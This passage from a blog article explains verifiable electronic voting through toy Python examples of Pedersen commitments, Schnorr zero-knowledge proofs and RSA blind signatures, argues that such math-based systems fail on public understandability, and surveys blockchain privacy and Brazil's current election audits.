<p>Now suppose a rigged machine that flips a fraction of the votes. You pick <code>vote=1</code>; it internally records <code>vote=0</code> and shows <code>C = 12</code> on screen (<code>pedersen(0, 7) = 12</code>). If you <strong>cast</strong>, the fraud sails through. But if you <strong>challenge</strong>, the machine is cornered: it has to reveal a <code>(vote, nonce)</code> pair that opens <code>C = 12</code>. The only one it knows is <code>(0, 7)</code> — and revealing that exposes the swap right in front of you: &ldquo;I voted 1!&rdquo;. Opening it as <code>vote=1</code> would require finding a nonce <code>n</code> with <code>pedersen(1, n) = 12</code>, which is the discrete log problem all over again. With our toy prime a brute force search finds one (<code>n = 10</code> exists), but with 2048-bit primes a cheating machine flat out cannot produce the answer.</p>
<p>And what springs the trap: the machine <strong>cannot know in advance</strong> whether you&rsquo;ll cast or challenge. The decision is yours, made after the commitment is already on screen. If a slice of the electorate tests a few ballots before voting for real, a machine that flips votes at scale gets caught with overwhelming probability. Real verifiable voting systems like Helios and ElectionGuard use exactly this mechanism.</p>
<p>And notice this breaks nobody&rsquo;s secrecy: the revealed nonce belongs to a <strong>spoiled</strong> ballot that doesn&rsquo;t count. The vote that counts keeps its nonce destroyed and its commitment impenetrable.</p>
<h2>Building block 5: a real zero-knowledge proof — Schnorr<span class="hx:absolute hx:-mt-20" id="building-block-5-a-real-zero-knowledge-proof--schnorr"></span>
    <a href="#building-block-5-a-real-zero-knowledge-proof--schnorr" class="subheading-anchor" aria-label="Permalink for this section"></a></h2><p>One more piece is missing. What guarantees that each commitment in the tree contains a <strong>valid vote</strong> — and not, say, <code>vote = 500</code>, which would inflate the result? The machine must prove the commitment opens to a legitimate value <strong>without opening the commitment</strong>. That&rsquo;s a zero-knowledge proof in the strict sense.</p>
<p>The canonical example, and one you can demonstrate with small numbers, is the <strong>Schnorr</strong> protocol: proving you know a secret <code>s</code> such that <code>y = g^s mod p</code>, without revealing <code>s</code>. The intuition before the math: it&rsquo;s Ali Baba&rsquo;s cave. The cave has two passages that meet at a locked door. You prove you have the key by walking in one side and coming out whichever side the verifier calls — without ever showing the key. Without the key, you&rsquo;d only guess the call right by luck, 50% of the time; after 20 rounds, the odds of fooling anyone are below one in a million.</p>
<p>The mathematical version, with our toy numbers (<code>p = 23</code>, <code>g = 4</code>, order <code>q = 11</code>):</p>
<div class="hextra-code-block hx:relative hx:mt-6 hx:first:mt-0 hx:group/code">

<div><div class="highlight"><pre tabindex="0" class="chroma"><code class="language-python" data-lang="python"><span class="line"><span class="cl"><span class="n">segredo</span> <span class="o">=</span> <span class="mi">7</span>
</span></span><span class="line"><span class="cl"><span class="n">y</span> <span class="o">=</span> <span class="nb">pow</span><span class="p">(</span><span class="n">g</span><span class="p">,</span> <span class="n">segredo</span><span class="p">,</span> <span class="n">p</span><span class="p">)</span>   <span class="c1"># y = 4^7 mod 23 = 8  (public value)</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl"><span class="c1"># 1. commitment: the prover picks a random r and sends t</span>
</span></span><span class="line"><span class="cl"><span class="n">r</span> <span class="o">=</span> <span class="mi">3</span>
</span></span><span class="line"><span class="cl"><span class="n">t</span> <span class="o">=</span> <span class="nb">pow</span><span class="p">(</span><span class="n">g</span><span class="p">,</span> <span class="n">r</span><span class="p">,</span> <span class="n">p</span><span class="p">)</span>          <span class="c1"># t = 4^3 mod 23 = 18</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl"><span class="c1"># 2. challenge: the verifier picks a random c</span>
</span></span><span class="line"><span class="cl"><span class="n">c</span> <span class="o">=</span> <span class="mi">5</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl"><span class="c1"># 3. response: the prover computes z</span>
</span></span><span class="line"><span class="cl"><span class="n">z</span> <span class="o">=</span> <span class="p">(</span><span class="n">r</span> <span class="o">+</span> <span class="n">c</span> <span class="o">*</span> <span class="n">segredo</span><span class="p">)</span> <span class="o">%</span> <span class="n">q</span>  <span class="c1"># z = (3 + 5*7) mod 11 = 5</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl"><span class="c1"># verification: g^z == t * y^c (mod p)</span>
</span></span><span class="line"><span class="cl"><span class="n">esq</span> <span class="o">=</span> <span class="nb">pow</span><span class="p">(</span><span class="n">g</span><span class="p">,</span> <span class="n">z</span><span class="p">,</span> <span class="n">p</span><span class="p">)</span>                 <span class="c1"># 4^5 mod 23 = 12</span>
</span></span><span class="line"><span class="cl"><span class="nb">dir</span> <span class="o">=</span> <span class="p">(</span><span class="n">t</span> <span class="o">*</span> <span class="nb">pow</span><span class="p">(</span><span class="n">y</span><span class="p">,</span> <span class="n">c</span><span class="p">,</span> <span class="n">p</span><span class="p">))</span> <span class="o">%</span> <span class="n">p</span>       <span class="c1"># 18 * 8^5 mod 23 = 12</span>
</span></span><span class="line"><span class="cl"><span class="nb">print</span><span class="p">(</span><span class="n">esq</span> <span class="o">==</span> <span class="nb">dir</span><span class="p">)</span>                  <span class="c1"># True</span></span></span></code></pre></div></div><div class="hextra-code-copy-btn-container hx:opacity-0 hx:transition hx:group-hover/code:opacity-100 hx:flex hx:gap-1 hx:absolute hx:m-[11px] hx:right-0 hx:top-0">
  <button
    class="hextra-code-copy-btn hx:group/copybtn hx:cursor-pointer hx:transition-all hx:active:opacity-50 hx:bg-primary-700/5 hx:border hx:border-black/5 hx:text-gray-600 hx:hover:text-gray-900 hx:rounded-md hx:p-1.5 hx:dark:bg-primary-300/10 hx:dark:border-white/10 hx:dark:text-gray-400 hx:dark:hover:text-gray-50"
    title="Copy code"
  >
    <div class="hextra-copy-icon hx:group-[.copied]/copybtn:hidden hx:pointer-events-none hx:h-4 hx:w-4"></div>
<div class="hextra-success-icon hx:hidden hx:group-[.copied]/copybtn:block hx:pointer-events-none hx:h-4 hx:w-4"></div>
  </button>
</div>
</div>
<p>It works because <code>g^z = g^(r + c·s) = g^r · (g^s)^c = t · y^c</code>. The algebra checks out. Now observe what the verifier saw: the numbers <code>t</code>, <code>c</code>, <code>z</code>, and the final check. At no point did the secret <code>s = 7</code> show up. And an impostor who doesn&rsquo;t know <code>s</code> can&rsquo;t answer an arbitrary challenge: if they guess <code>z = 2</code>, the verifier computes <code>g^2 = 16 ≠ 12</code> and the fraud is exposed.</p>
<p>And why does the verifier learn <strong>nothing</strong> about <code>s</code>, rather than just &ldquo;not much&rdquo;? Because the whole conversation could have been fabricated by someone who <strong>doesn&rsquo;t know the secret</strong>, in this inverted order:</p>
<div class="hextra-code-block hx:relative hx:mt-6 hx:first:mt-0 hx:group/code">

<div><div class="highlight"><pre tabindex="0" class="chroma"><code class="language-python" data-lang="python"><span class="line"><span class="cl"><span class="c1"># simulator: pick c and z FIRST, then compute the t that closes the equation</span>
</span></span><span class="line"><span class="cl"><span class="n">c_sim</span><span class="p">,</span> <span class="n">z_sim</span> <span class="o">=</span> <span class="mi">5</span><span class="p">,</span> <span class="mi">9</span>
</span></span><span class="line"><span class="cl"><span class="n">t_sim</span> <span class="o">=</span> <span class="p">(</span><span class="nb">pow</span><span class="p">(</span><span class="n">g</span><span class="p">,</span> <span class="n">z_sim</span><span class="p">,</span> <span class="n">p</span><span class="p">)</span> <span class="o">*</span> <span class="nb">pow</span><span class="p">(</span><span class="n">y</span><span class="p">,</span> <span class="o">-</span><span class="n">c_sim</span> <span class="o">%</span> <span class="n">q</span><span class="p">,</span> <span class="n">p</span><span class="p">))</span> <span class="o">%</span> <span class="n">p</span>  <span class="c1"># t = 8</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl"><span class="c1"># checking the forged transcript:</span>
</span></span><span class="line"><span class="cl"><span class="nb">pow</span><span class="p">(</span><span class="n">g</span><span class="p">,</span> <span class="n">z_sim</span><span class="p">,</span> <span class="n">p</span><span class="p">)</span>              <span class="c1"># 4^9 mod 23 = 13</span>
</span></span><span class="line"><span class="cl"><span class="p">(</span><span class="n">t_sim</span> <span class="o">*</span> <span class="nb">pow</span><span class="p">(</span><span class="n">y</span><span class="p">,</span> <span class="n">c_sim</span><span class="p">,</span> <span class="n">p</span><span class="p">))</span> <span class="o">%</span> <span class="n">p</span>  <span class="c1"># 8 * 8^5 mod 23 = 13  -&gt; it matches!</span></span></span></code></pre></div></div><div class="hextra-code-copy-btn-container hx:opacity-0 hx:transition hx:group-hover/code:opacity-100 hx:flex hx:gap-1 hx:absolute hx:m-[11px] hx:right-0 hx:top-0">
  <button
    class="hextra-code-copy-btn hx:group/copybtn hx:cursor-pointer hx:transition-all hx:active:opacity-50 hx:bg-primary-700/5 hx:border hx:border-black/5 hx:text-gray-600 hx:hover:text-gray-900 hx:rounded-md hx:p-1.5 hx:dark:bg-primary-300/10 hx:dark:border-white/10 hx:dark:text-gray-400 hx:dark:hover:text-gray-50"
    title="Copy code"
  >
    <div class="hextra-copy-icon hx:group-[.copied]/copybtn:hidden hx:pointer-events-none hx:h-4 hx:w-4"></div>
<div class="hextra-success-icon hx:hidden hx:group-[.copied]/copybtn:block hx:pointer-events-none hx:h-4 hx:w-4"></div>
  </button>
</div>
</div>
<p>The forged transcript <code>(t=8, c=5, z=9)</code> passes verification and is <strong>indistinguishable</strong> from a real one. If anyone can fabricate a valid conversation without knowing the secret, then the real conversation cannot contain any information about the secret. That&rsquo;s what &ldquo;zero knowledge&rdquo; formally means. (For use outside a lab, the challenge <code>c</code> is derived by hashing the commitment — the Fiat-Shamir transform — and the proof becomes a single, non-interactive object that anyone verifies offline.)</p>
<p>In our hypothetical election, the machine publishes, alongside each vote, a proof of this kind — in practice, an OR-variant (&ldquo;the vote is 0 <strong>or</strong> it is 1&rdquo;, without saying which) — and any auditor verifies that every vote in the tree is valid, without ever seeing a single one.</p>
<h2>Building block 6: what stops phantom votes?<span class="hx:absolute hx:-mt-20" id="building-block-6-what-stops-phantom-votes"></span>
    <a href="#building-block-6-what-stops-phantom-votes" class="subheading-anchor" aria-label="Permalink for this section"></a></h2><p>One hole is left, and it&rsquo;s a favorite among digital-election skeptics: what stops the authority from <strong>stuffing the tree with invented votes</strong>? Every commitment in the Merkle tree carries a ZK proof that it contains a valid vote — but the proof only guarantees the value is 0 or 1. A thousand phantom votes would be a thousand perfectly valid commitments with perfectly correct proofs. The tree is public, anyone can count the leaves&hellip; but who says there should be 8 and not 8,000?</p>
<p>The first answer is replication. The tree follows the transparency-log model — the same Certificate Transparency that protects the HTTPS certificates you use all day: one publisher writes, and dozens of independent observers (parties, the bar association, universities, the press, you) copy the tree, sign the root, and cross-check each other. Rewriting history would mean convincing all of them to accept a root different from the one they already signed.</p>
<p>That protects what&rsquo;s already published. But <strong>creating</strong> phantom votes? That&rsquo;s where the most elegant piece of all comes in, from the same David Chaum who invented digital cash and mix-nets: the <strong>blind signature</strong> (1982).</p>
<p>The flow: you authenticate at the registration desk like today — ID, biometrics. In the booth, the machine computes your commitment (Building block 2), but before publishing it needs a credential from the desk. The machine <strong>blinds</strong> the commitment with a random factor and sends the desk only the blinded value — and here being online is no problem at all, as we saw in the air-gap section. The desk, which already registered your authentication, signs exactly once, without seeing the content. The machine unblinds the signature and publishes the pair <code>(commitment, signature)</code>. In the end, the desk has no idea which commitment it signed — so it cannot link your identity to your vote. With toy RSA, you can watch the magic happen:</p>
<div class="hextra-code-block hx:relative hx:mt-6 hx:first:mt-0 hx:group/code">

<div><div class="highlight"><pre tabindex="0" class="chroma"><code class="language-python" data-lang="python"><span class="line"><span class="cl"><span class="c1"># the desk&#39;s toy RSA: n=3233, e=17 (public), d=2753 (private)</span>
</span></span><span class="line"><span class="cl"><span class="n">n</span><span class="p">,</span> <span class="n">e</span><span class="p">,</span> <span class="n">d</span> <span class="o">=</span> <span class="mi">3233</span><span class="p">,</span> <span class="mi">17</span><span class="p">,</span> <span class="mi">2753</span>
</span></span><span class="line"><span class="cl"><span class="n">C</span> <span class="o">=</span> <span class="mi">16</span>        <span class="c1"># your Pedersen commitment, the same one from Building block 3</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl"><span class="c1"># 1. the machine blinds the commitment with a random factor r</span>
</span></span><span class="line"><span class="cl"><span class="n">r</span> <span class="o">=</span> <span class="mi">7</span>
</span></span><span class="line"><span class="cl"><span class="n">cego</span> <span class="o">=</span> <span class="p">(</span><span class="n">C</span> <span class="o">*</span> <span class="nb">pow</span><span class="p">(</span><span class="n">r</span><span class="p">,</span> <span class="n">e</span><span class="p">,</span> <span class="n">n</span><span class="p">))</span> <span class="o">%</span> <span class="n">n</span>       <span class="c1"># 2341 -&gt; this is all the desk sees</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl"><span class="c1"># 2. the desk, which already logged your authentication, signs the BLIND value</span>
</span></span><span class="line"><span class="cl"><span class="n">ass_cego</span> <span class="o">=</span> <span class="nb">pow</span><span class="p">(</span><span class="n">cego</span><span class="p">,</span> <span class="n">d</span><span class="p">,</span> <span class="n">n</span><span class="p">)</span> <span class="o">%</span> <span class="n">n</span>      <span class="c1"># 216</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl"><span class="c1"># 3. the machine removes the blind factor and publishes (C, s) to the tree</span>
</span></span><span class="line"><span class="cl"><span class="n">s</span> <span class="o">=</span> <span class="p">(</span><span class="n">ass_cego</span> <span class="o">*</span> <span class="nb">pow</span><span class="p">(</span><span class="n">r</span><span class="p">,</span> <span class="o">-</span><span class="mi">1</span><span class="p">,</span> <span class="n">n</span><span class="p">))</span> <span class="o">%</span> <span class="n">n</span>  <span class="c1"># 2802</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl"><span class="c1"># any auditor checks: s^e mod n == C ?</span>
</span></span><span class="line"><span class="cl"><span class="nb">print</span><span class="p">(</span><span class="nb">pow</span><span class="p">(</span><span class="n">s</span><span class="p">,</span> <span class="n">e</span><span class="p">,</span> <span class="n">n</span><span class="p">))</span>   <span class="c1"># 16 -&gt; the commitment, with a valid signature!</span></span></span></code></pre></div></div><div class="hextra-code-copy-btn-container hx:opacity-0 hx:transition hx:group-hover/code:opacity-100 hx:flex hx:gap-1 hx:absolute hx:m-[11px] hx:right-0 hx:top-0">
  <button
    class="hextra-code-copy-btn hx:group/copybtn hx:cursor-pointer hx:transition-all hx:active:opacity-50 hx:bg-primary-700/5 hx:border hx:border-black/5 hx:text-gray-600 hx:hover:text-gray-900 hx:rounded-md hx:p-1.5 hx:dark:bg-primary-300/10 hx:dark:border-white/10 hx:dark:text-gray-400 hx:dark:hover:text-gray-50"
    title="Copy code"
  >
    <div class="hextra-copy-icon hx:group-[.copied]/copybtn:hidden hx:pointer-events-none hx:h-4 hx:w-4"></div>
<div class="hextra-success-icon hx:hidden hx:group-[.copied]/copybtn:block hx:pointer-events-none hx:h-4 hx:w-4"></div>
  </button>
</div>
</div>
<p>Notice: the desk only saw the number 2341, which to them is noise. They signed 216 without knowing they were signing your <code>C = 16</code>. Yet the pair <code>(C, s)</code> passes any auditor&rsquo;s verification. It&rsquo;s a regular digital signature — <code>s</code> is exactly <code>C^d mod n</code> — just produced without the signer ever seeing the document. It looks like a magic trick, but it&rsquo;s plain RSA algebra: blinding multiplies by <code>r^e</code>; signing raises everything to <code>d</code>, and since <code>e·d ≡ 1</code>, what&rsquo;s left is <code>C^d · r</code>; unblinding divides by <code>r</code>, leaving <code>C^d</code>.</p>
<p>Now assemble the full picture: <strong>a leaf only enters the tree carrying two things — the ZK validity proof (Building block 5) and a credential signed by the desk (Building block 6).</strong> The desk issues one credential per authentication, and authentication is a public event: there&rsquo;s a line at the precinct, poll workers, party watchers, the biometric log, the per-precinct attendance count published every election. At the end of the day, the equation anyone can check is:</p>
<p><strong>number of leaves in the tree == number of authenticated voters.</strong></p>
<p>A phantom vote is a leaf without a credential (doesn&rsquo;t get in) or a credential without a voter (inflates the count and shows). Removing a legitimate vote breaks the receipt&rsquo;s inclusion proof (Building block 3). Altering a published vote breaks the hashes on the observers&rsquo; copies. Stealing credentials would mean fooling the biometrics in front of watchers. Every fraud path hits a different wall — and every wall is checkable by anyone, from home.</p>
<h2>The weakest link: who proves you are you?<span class="hx:absolute hx:-mt-20" id="the-weakest-link-who-proves-you-are-you"></span>
    <a href="#the-weakest-link-who-proves-you-are-you" class="subheading-anchor" aria-label="Permalink for this section"></a></h2><p>Everything before this section is math. But there&rsquo;s one door no math can lock: authentication. No algorithm proves the human standing in front of you is who they claim to be. That is, honestly, the weakest link in the entire system — and it&rsquo;s worth facing head-on.</p>
<p>And here Brazil simplifies the problem, because it already paid the expensive part: the voter biometric registry exists and covers over 80% of the electorate — more than 124 million people, <a href="https://www.tse.jus.br/comunicacao/noticias/2024/Fevereiro/eleitores-sem-cadastro-biometrico-podem-votar-normalmente"target="_blank" rel="noopener">per the electoral court</a>. National deduplication already ran: one finger exists only once in the roll, no matter how many forged documents back it up. And fingerprints already release the vote at the precinct — in 2026, in <a href="https://www.tre-mg.jus.br/comunicacao/noticias/2026/Julho/manual-do-eleitor-entenda-como-vai-funcionar-a-biometria-nas-eleicoes-2026"target="_blank" rel="noopener">every precinct in the country</a>. For this article&rsquo;s hypothetical system, biometric authentication is free: reuse what&rsquo;s already standing.</p>
<p>Of course, that registry existing is itself the privacy bet: biometrics are irrevocable data — you can change a password, not your fingerprints. Aadhaar, India&rsquo;s biometric registry, had incidents exposing data on over a billion people; the OPM, the US government&rsquo;s HR office, lost 5.6 million fingerprints in a single 2015 breach. A national biometric database is a single point of catastrophic, permanent failure — and Brazil already made that bet. The hypothetical system doesn&rsquo;t make it worse; it just inherits it.</p>
<p>For anyone outside the biometric registry, the precinct falls back to the photo ID — and cards get forged. They probably get forged today. But notice what the architecture does to that problem: one forged authentication mints <strong>one</strong> credential, which yields <strong>one</strong> leaf in the tree. To fraud at scale, the criminal needs flesh-and-blood people showing up in person, in front of poll workers and watchers, once per fake vote. That&rsquo;s retail fraud: expensive, visible, slow. A thousand fake votes require a thousand bodies — and then it&rsquo;s not silent digital fraud anymore, it&rsquo;s chartered-bus logistics everyone sees rolling by. The system doesn&rsquo;t prevent forgery; it <strong>caps the damage per forgery at exactly one vote</strong> and pushes the cost into the physical world.</p>
<p>And anomalies surface: the equation from Building block 6 — leaves == authentications — can be checked precinct by precinct. A precinct with 400 registered voters and 420 authentications raises eyebrows. Regional turnout above 100% raises eyebrows. And if paranoia runs high, the desk&rsquo;s signing key can be fragmented like the election key, requiring a quorum to issue credentials.</p>
<p>The honest summary: the link stays physical and human — a human proving, once, in public, that they&rsquo;re on the roll — and no system, however perfect, eliminates it. The best possible design does two things with it: shrinks the trust surface down to that single event and makes its failures <strong>visible</strong> instead of silent. With biometrics valid at every precinct in 2026, identity forgery becomes the most expensive, least scalable path of all — which is exactly where a well-designed system wants it. There&rsquo;s no free lunch, and pretending there is one is the kind of pitch this whole article refuses to make.</p>
<h2>Putting it all together: the full protocol<span class="hx:absolute hx:-mt-20" id="putting-it-all-together-the-full-protocol"></span>
    <a href="#putting-it-all-together-the-full-protocol" class="subheading-anchor" aria-label="Permalink for this section"></a></h2><p>The hypothetically perfect election would go like this:</p>
<ol>
<li><strong>Setup.</strong> A group of independent authorities (the electoral court, the bar association, parties, civil society) jointly generates the election&rsquo;s public key. The corresponding private key stays fragmented: no single authority can decrypt anything; only a majority acting together can.</li>
<li><strong>Authentication.</strong> The voter identifies at the registration desk — ID, biometrics, like today — and the desk logs the authentication. This authorizes the issuance of <strong>one</strong> credential: the blind signature on a commitment, without the desk seeing the content. No link between identity and vote.</li>
<li><strong>Voting.</strong> The voter picks the candidate on the screen. The machine generates a random nonce, computes the Pedersen commitment and the ElGamal ciphertext of the same vote (the commitment becomes the receipt&rsquo;s serial; the ciphertext is what gets tallied), produces the ZK validity proof, and shows the commitment on screen. The voter then decides: cast, and the nonce is destroyed — or challenge, and the machine reveals the nonce for an on-the-spot check, the ballot is spoiled, and they vote again. Once cast, the machine blinds the commitment, the desk signs it sight unseen, and the machine unblinds the signature.</li>
<li><strong>Publication.</strong> The commitment goes into a public Merkle tree, together with the ZK proof and the credential — replicated and signed by multiple independent observers. No credential, no entry.</li>
<li><strong>Receipt.</strong> The voter takes home a slip of paper with the serial. They <strong>cannot</strong> prove to anyone who they voted for — even if they want to, because they don&rsquo;t have the nonce.</li>
<li><strong>Individual verification.</strong> At home, the voter downloads the tree (or uses any independent website) and checks their serial is there, with the inclusion proof. If it isn&rsquo;t, they hold material proof of fraud.</li>
<li><strong>Universal verification.</strong> Any citizen, university, or party rebuilds the entire tree, checks the root, validates every ZK proof and credential, and confirms the leaf count matches the published per-precinct authentication totals.</li>
<li><strong>Tallying.</strong> In the end, the encrypted votes go through a mix-net (they get re-shuffled and re-encrypted, severing the link to their original positions) and the authorities decrypt jointly, proving each step. The total matches the public root, or the fraud is evident.</li>
</ol>
<p>Notice what changed relative to the current system: <strong>you no longer need to trust the electoral court, the voting machine, or any auditor.</strong> Every property is individually verifiable by anyone with a computer. It&rsquo;s the same principle that lets Bitcoin work without a central bank: don&rsquo;t trust, verify.</p>
<p>Before anyone gets too excited: this is a simplification. A real system still has to solve anonymous credentials more robust than our toy blind signature, tree availability, and a pile of operational details. The point here is not the complete design; it&rsquo;s the core mechanism.</p>
<h2>Why this would never work<span class="hx:absolute hx:-mt-20" id="why-this-would-never-work"></span>
    <a href="#why-this-would-never-work" class="subheading-anchor" aria-label="Permalink for this section"></a></h2><p>Now for the part almost nobody proposing these systems wants to hear.</p>
<p>Scroll back to the beginning of this article and notice what I had to explain to get here: hash functions, commitments, modular arithmetic, discrete logarithms, Merkle trees, the Benaloh challenge, blind signatures, zero-knowledge proofs, simulators. With code, with numbers, with step-by-step examples. And even so, I&rsquo;d bet a good share of readers — programmers included — made it here without full certainty that they truly understand why the scheme is secure.</p>
<p>And that&rsquo;s not for lack of intelligence. It&rsquo;s because trusting this system requires understanding math that the vast majority of the population will never understand. The only human being who can be <strong>100% certain</strong> this system is correct is the one who can verify the mathematical proofs on their own. Everyone else — 99.9% of the population — wouldn&rsquo;t be <em>verifying</em> anything. They&rsquo;d be <strong>believing</strong> the mathematician who says it works.</p>
<p>And here we hit the fatal contradiction: if an electoral system requires the ordinary citizen to blindly believe a specialist they can&rsquo;t audit, it is <strong>exactly as opaque as the TSE&rsquo;s current system</strong>. The opacity just moved address: instead of trusting the court bureaucrat, you trust the cryptographer. For dona Maria, who sells pastel at the street market, it&rsquo;s all the same — both are &ldquo;a bunch of mumbo-jumbo I don&rsquo;t understand&rdquo;. And a system the population cannot understand is a system whose legitimacy it will never accept. Today&rsquo;s skeptic saying &ldquo;I don&rsquo;t trust the voting machine&rdquo; would become tomorrow&rsquo;s skeptic saying &ldquo;I don&rsquo;t trust this algebra&rdquo;.</p>
<p>An election is not only an engineering problem; it&rsquo;s a <strong>social trust</strong> problem. The gold standard of transparency is the system <strong>anyone can watch with their own eyes</strong>: paper ballot, glass ballot box, public counting at the precinct, the tally posted on the door. Anyone understands paper being counted in public. Nobody has to believe anybody.</p>
<p>That&rsquo;s why countries far richer and more technological than Brazil — Germany, the Netherlands, France, most of the US — stick with paper or demand an auditable paper trail. That&rsquo;s not backwardness. It&rsquo;s the recognition that verifiability only specialists understand is not public verifiability.</p>
<h2>Sidebar: what cryptocurrencies prove every day<span class="hx:absolute hx:-mt-20" id="sidebar-what-cryptocurrencies-prove-every-day"></span>
    <a href="#sidebar-what-cryptocurrencies-prove-every-day" class="subheading-anchor" aria-label="Permalink for this section"></a></h2><p>Before wrapping up, a detour to answer the question that always comes up: &ldquo;but does this actually work, or is it napkin theory?&rdquo; It works. And the proof has been running for almost two decades, moving billions of dollars, under constant attack: blockchains.</p>
<p>First, clearing up a misunderstanding: <strong>blockchain is not synonymous with cryptocurrency.</strong> As the name says, it&rsquo;s just a chain of blocks. Each block carries a Merkle tree of records and the previous block&rsquo;s hash. In Bitcoin, the block header holds the transaction tree&rsquo;s root, the previous block&rsquo;s hash, a timestamp, and a nonce — here, a mining counter — that miners vary until the hash of the entire block falls below the difficulty target: the famous proof of work. It&rsquo;s Building block 3 of this article, extended through time: not one tree, but a chain of trees, each sealing the one before.</p>
<p>The practical result is the guarantee that matters here: tamper with <strong>one transaction</strong> in an old block and the tree&rsquo;s root changes, the block&rsquo;s hash changes, the link to the next block breaks, and to hide that you&rsquo;d need to redo the proof of work of every block up to today — while thousands of honest nodes keep extending the true chain. Once everything is signed and sealed by hash, rewriting the past is computationally impossible. That&rsquo;s exactly why Bitcoin can be 100% public: the exposure itself is the protection. Everyone has a copy of everything, so nobody rewrites history.</p>
<p><strong>But public does not mean anonymous.</strong> That&rsquo;s the part most people get wrong. In Bitcoin, every transaction stays visible forever: which addresses fed it, which received, how much moved. Addresses are pseudonyms — pen names, not anonymity. And there&rsquo;s an entire chain-analysis industry (Chainalysis, Elliptic, TRM) making a living gluing identities to those pen names:</p>
<ul>
<li><strong>Common-input heuristic:</strong> if a transaction spends coins from several addresses, they almost certainly belong to the same wallet. Group them into a cluster.</li>
<li><strong>Change detection:</strong> the output that returns to a fresh address usually belongs to the payer.</li>
<li><strong>Bridge to the real world:</strong> when a cluster&rsquo;s address touches a KYC exchange, a name and a tax ID attach to the whole cluster — and to its complete history, retroactively.</li>
</ul>
<p>That&rsquo;s how the FBI recovered part of the Colonial Pipeline ransom, that&rsquo;s how the Silk Road coins were traced years later, and that&rsquo;s how the ~1,128 BTC stolen from ColdCards are still sitting in known addresses half the world is watching — I detailed it in the <a href="/en/2026/08/01/exploiting-coinkites-rng-egregious-problem/">article about Coinkite&rsquo;s RNG</a>. If the thief moves a single satoshi to a KYC exchange, they identify themselves. The chain guarantees integrity, not secrecy.</p>
<p>For real anonymity, the chain alone doesn&rsquo;t cut it: you need zero-knowledge proofs. Monero, for instance, combines three techniques:</p>
<ol>
<li><strong>Ring signatures:</strong> each spend is signed on behalf of a group of possible keys. The signature proves <strong>one of them</strong> authorized it, without revealing which.</li>
<li><strong>Stealth addresses:</strong> the recipient&rsquo;s address never appears on the chain; each payment creates a disposable address derived from a shared secret.</li>
<li><strong>RingCT</strong> (<em>confidential transactions</em>): amounts stay hidden inside <strong>Pedersen commitments</strong> — yes, the exact same Building block 2 from this article — and a ZK range proof guarantees nobody minted coins out of thin air, without revealing any amount.</li>
</ol>
<p>Zcash follows the same philosophy with zk-SNARKs: you prove &ldquo;I own a valid, unspent note&rdquo; without revealing which note. The network verifies the proof, accepts the transaction, and learns neither sender, recipient, nor value.</p>
<p>And here the circle closes. Look at what this article&rsquo;s electoral scheme uses: a public, immutable structure anyone can verify (the Merkle tree, the blockchain&rsquo;s simpler cousin), Pedersen commitments to hide content (the same primitive as Monero), and ZK proofs to guarantee validity without revelation (the same family as Monero and Zcash). None of this is lab conjecture: these are production systems, audited, attacked daily, protecting real money. An election is, if anything, a simpler problem — short window, a single publisher, offline verification.</p>
<p>That&rsquo;s why I said at the beginning that the idea is mathematically solid: it invents nothing, it just composes pieces that already proved they can survive the real world. We know an end-to-end verifiable digital election <strong>could</strong> be built, because every one of its components is already built and running. Which brings us back to the problem that isn&rsquo;t technical.</p>
<h2>Conclusion<span class="hx:absolute hx:-mt-20" id="conclusion"></span>
    <a href="#conclusion" class="subheading-anchor" aria-label="Permalink for this section"></a></h2><p>Let me make it clear once more, as I did in the tweets: <strong>this is not a proposal, it&rsquo;s an exercise.</strong> I don&rsquo;t know the solution to Brazil&rsquo;s electoral trust problem. If I did, I&rsquo;d be publishing a paper, not a blog post.</p>
<p>But the exercise is worth it for two reasons. First, because it shows the technology for individual and universal verifiability <strong>exists</strong> — anyone who says &ldquo;digital elections are inherently unauditable&rdquo; is wrong. Second, because it shows the real limit: the frontier isn&rsquo;t technical, it&rsquo;s epistemological. A perfect system nobody understands fails at the same point as an imperfect system nobody can audit.</p>
<p>If you understood every line of this article, congratulations: you&rsquo;re part of a minority far too small to carry a democracy on its back.</p>
<h2>Appendix 1: so is the current system auditable?<span class="hx:absolute hx:-mt-20" id="appendix-1-so-is-the-current-system-auditable"></span>
    <a href="#appendix-1-so-is-the-current-system-auditable" class="subheading-anchor" aria-label="Permalink for this section"></a></h2><p>A fair question hangs in the air: so the current system has no auditing at all? It does, and it&rsquo;s worth being honest about that. What doesn&rsquo;t exist is a specific kind of audit: one that doesn&rsquo;t depend on software. Let&rsquo;s take it piece by piece.</p>
<p>The current arsenal, summarized and sourced:</p>
<ul>
<li><strong>Source code inspection.</strong> Parties, the bar association, the federal audit court, the Federal Police, the prosecutor&rsquo;s office, and universities can examine the systems&rsquo; code at the electoral court&rsquo;s headquarters, months before the election — the so-called <a href="https://www.tse.jus.br/comunicacao/noticias/2025/Novembro/codigos-fonte-do-ciclo-de-transparencia-ao-teste-publico-da-urna"target="_blank" rel="noopener">transparency cycle</a>.</li>
<li><strong>Public Security Test (TPS).</strong> Outside researchers genuinely try to attack the system. And it works: in 2012, professor Diego Aranha&rsquo;s team unscrambled the RDV and showed it was possible to learn who each voter had voted for; in 2017, they managed to tamper with the voting software before installation (the story is in <a href="https://revistapesquisa.fapesp.br/a-urna-eletronica-na-maturidade/"target="_blank" rel="noopener">Revista Pesquisa FAPESP</a> and in this <a href="https://www.agencialupa.org/jornalismo/2023/11/27/entenda-como-funciona-o-teste-de-seguranca-das-urnas-eletronicas-feito-pelo-tse/"target="_blank" rel="noopener">Lupa summary</a>). The flaws found were fixed afterwards.</li>
<li><strong>Zero report, BU, and the Integrity Test.</strong> Before voting starts, the machine prints a zeroed-out report. At the end of the day, it prints the Boletim de Urna, posted at the precinct and published digitally with a QR code — anyone can download the BUs and add them up independently. And a random sample of machines is diverted to a filmed parallel vote, comparing the paper record against the digital one.</li>
